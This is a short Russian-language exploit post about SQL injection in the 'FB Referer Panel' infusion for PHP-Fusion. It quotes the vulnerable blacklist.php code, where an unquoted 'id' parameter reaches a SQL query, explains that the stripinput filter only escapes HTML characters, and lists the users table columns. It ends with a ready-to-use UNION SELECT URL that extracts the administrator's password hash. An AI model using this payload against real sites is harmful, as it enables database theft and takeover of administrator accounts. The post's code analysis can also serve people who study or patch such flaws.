MOD name: FB Referer Panel (
download)
Version: 0.1
-----------------------------------------------------------------------
Default table prefix: fusion_
Columns from `users`:
Код:
user_id, user_name, user_password, user_admin_password, user_email
-----------------------------------------------------------------------
SQL Injection
Vuln file: blacklist.php
PHP код:
$go = stripinput($_GET['go']);
if ($go == "blocked"){
opentable($locale['lref_blacklisted_url']);
echo $locale['lref_blacklisted_reason']."<br />\n";
$query = dbquery("SELECT * FROM ".DB_LREF_BLACKLIST." WHERE lrefb_id=".stripinput($_GET["id"]));
$row = mysql_fetch_row($query);
echo "<div align='center'><b>".$row[2]."</b></div><br />\n";
echo $locale['lref_blacklisted_contact']."<a href='".BASEDIR."contact.php'>".$locale['lref_blacklisted_contact2']."</a>".$locale['lref_blacklisted_contact3'];
function
stripinput (для ознакомления :))
PHP код:
function stripinput($text) {
if (QUOTES_GPC) $text = stripslashes($text);
$search = array("&", "\"", "'", "\\", '\"', "\'", "<", ">", " ");
$replace = array("&", """, "'", "\", """, "'", "<", ">", " ");
$text = str_replace($search, $replace, $text);
return $text;
}
Exploit:
Код:
http://[host]/[path]/infusions/latest_referers/blacklist.php?go=blocked&id=1+and+null+union+select+null,null,user_password+from+[prefix]users+where+user_id=1